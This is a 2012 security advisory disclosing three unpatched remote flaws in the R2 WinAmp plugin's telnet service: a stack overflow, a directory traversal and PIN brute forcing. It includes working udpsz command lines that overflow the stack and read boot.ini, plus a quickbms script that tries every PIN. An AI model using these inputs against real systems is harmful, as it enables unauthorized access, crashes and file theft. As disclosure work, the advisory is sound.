R2 1.65 Stack Overflow / Directory Traversal / Brute Forcing

`#######################################################################  
  
Luigi Auriemma  
  
Application: R2  
http://www.rabidhamster.org/R2/  
Versions: <= 1.65  
Platforms: Windows  
Bugs: A] stack overflow  
B] directory traversal  
C] PIN brute forcing  
Exploitation: remote  
Date: 09 Feb 2012  
Author: Luigi Auriemma  
e-mail: [email protected]  
web: aluigi.org  
  
  
#######################################################################  
  
  
1) Introduction  
2) Bugs  
3) The Code  
4) Fix  
  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
From vendor's website:  
"R2/Extreme is a plugin for the WinAmp music player. It produces  
animated 3D graphics in real-time that twist and turn with the music.  
Now used in nightclubs, parties, and even (apparently) a canadian  
stripclub, R2 has become known for its fast, fluid visuals."  
  
  
#######################################################################  
  
=======  
2) Bugs  
=======  
  
  
The registered version of R2 has a telnet port active by default and  
uses a PIN number with a very limited range, from 1 to 9999.  
The result is that it's enough to make a simple scanning of 9999 tries  
to find the correct PIN and being able to exploit the following  
vulnerabilites.  
  
There are no IP bannings or other limitations, just check the "UNLOCKED"  
reply to know what is the right PIN.  
  
  
-----------------  
A] stack overflow  
-----------------  
  
Stack overflow through the "File" command.  
  
  
----------------------  
B] directory traversal  
----------------------  
  
Directory traversal exploitable through the "File" command that allows  
to view the files on the disk in which is installed the software.  
  
  
--------------------  
C] PIN brute forcing  
--------------------  
  
As explained in the introduction it's possible to brute force the PIN  
number very easily being only 9999 those available.  
  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
  
http://aluigi.org/testz/udpsz.zip  
  
1234 is the default PIN number, change it accordingly with the one  
found through the brute forcing scanner.  
  
A]  
udpsz -T -b a -c "1234\r\nFile([" 0 -c "])\r\n" -1 -D -3 SERVER 23 4000  
  
B]  
udpsz -T -b a -c "1234\r\nFile([../../../../../../boot.ini])" -D -3 SERVER 23 -1  
  
C]  
http://aluigi.org/papers/quickbms.zip  
  
### beginning of the script r2_1c.bms ###  
for i = 1 <= 9999  
print "scan PIN %i%"  
put i line  
do  
get TEXT line  
if TEXT == "UNLOCKED"  
print "PIN found: %i%"  
cleanexit  
endif  
while TEXT != "NOT UNLOCKED"  
next i  
### end of the script ###  
  
quickbms -n r2_1c.bms tcp://SERVER:23  
  
  
#######################################################################  
  
======  
4) Fix  
======  
  
  
No fix.  
  
  
#######################################################################  
  
  
`